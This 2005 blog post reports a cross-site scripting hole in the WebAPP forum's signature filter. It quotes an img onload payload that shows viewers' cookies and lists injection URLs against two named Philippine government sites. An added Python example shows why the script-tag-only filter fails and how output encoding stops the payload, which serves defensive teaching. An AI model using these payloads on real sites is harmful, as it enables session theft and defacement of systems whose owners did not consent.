Thursday, March 31, 2005

Rebwisited...

I just revisited the WebAPP site. They've patched the flaws that were present last time, although they missed an XSS hole. Basically, registered users can put something like this " <img src="http://www.web-app.org/images/forum/smilies/grin.gif" onload='alert("Rebarz99 got your cookies"+document.cookie)'> " as their signature in their profile. When they post a comment in any of the forums, anyone who views the comments will have their cookies pop up. WebAPP filters <script> tags, but this kind of filtering can be bypassed. I haven't examined the latest version they've put out. Some vulnerabilities may still be left. :P
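An added example (not part of the original post, and not WebAPP's own code) showing why a filter that only removes <script> tags passes the signature above unchanged, and how encoding the signature on output renders it as inert text. The function names are hypothetical, and naive_strip_script is an assumed stand-in for the kind of filter described, written in Python for illustration.

```python
import html
import re
from html.parser import HTMLParser

# Constructed sample input: the signature quoted in the post.
SIGNATURE = ('<img src="http://www.web-app.org/images/forum/smilies/grin.gif" '
             'onload=\'alert("Rebarz99 got your cookies"+document.cookie)\'>')


def naive_strip_script(text):
    """Assumed stand-in for a filter that only removes <script> elements."""
    text = re.sub(r'(?is)<script\b.*?</script\s*>', '', text)
    return re.sub(r'(?i)</?script\b[^>]*>', '', text)


class _ActiveMarkupFinder(HTMLParser):
    """Records event-handler attributes and script-scheme URLs on any tag."""

    def __init__(self):
        super().__init__(convert_charrefs=True)
        self.findings = []

    def handle_starttag(self, tag, attrs):
        for name, value in attrs:
            if name.startswith('on'):
                # onload, onerror, onclick, ... run script without a <script> tag
                self.findings.append((tag, name))
            elif name in ('src', 'href') and value and re.match(
                    r'\s*(javascript|vbscript|data):', value, re.I):
                self.findings.append((tag, name))


def active_markup(text):
    """Return (tag, attribute) pairs that would execute script in a browser."""
    finder = _ActiveMarkupFinder()
    finder.feed(text)
    finder.close()
    return finder.findings


def render_signature(text):
    """Hardened output path: encode the signature so it displays as text."""
    return html.escape(text, quote=True)


if __name__ == '__main__':
    filtered = naive_strip_script(SIGNATURE)
    print('after script-only filter:', active_markup(filtered))
    print('after output encoding   :', active_markup(render_signature(SIGNATURE)))
```

If signatures must allow some HTML, the equivalent fix is an allowlist of tags and attributes that excludes every on* attribute, rather than a blocklist of tag names.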

Misc: http://www.dilg.gov.ph/index.cfm?fuseaction=<script>alert('Eat_my_fucking_shorts!')</script>

http://www.ncc.gov.ph/announcements.php?seq=235'<iframe%20width="100%"%20height=100%"%20src=http://rebarz99.blogspot.com/>
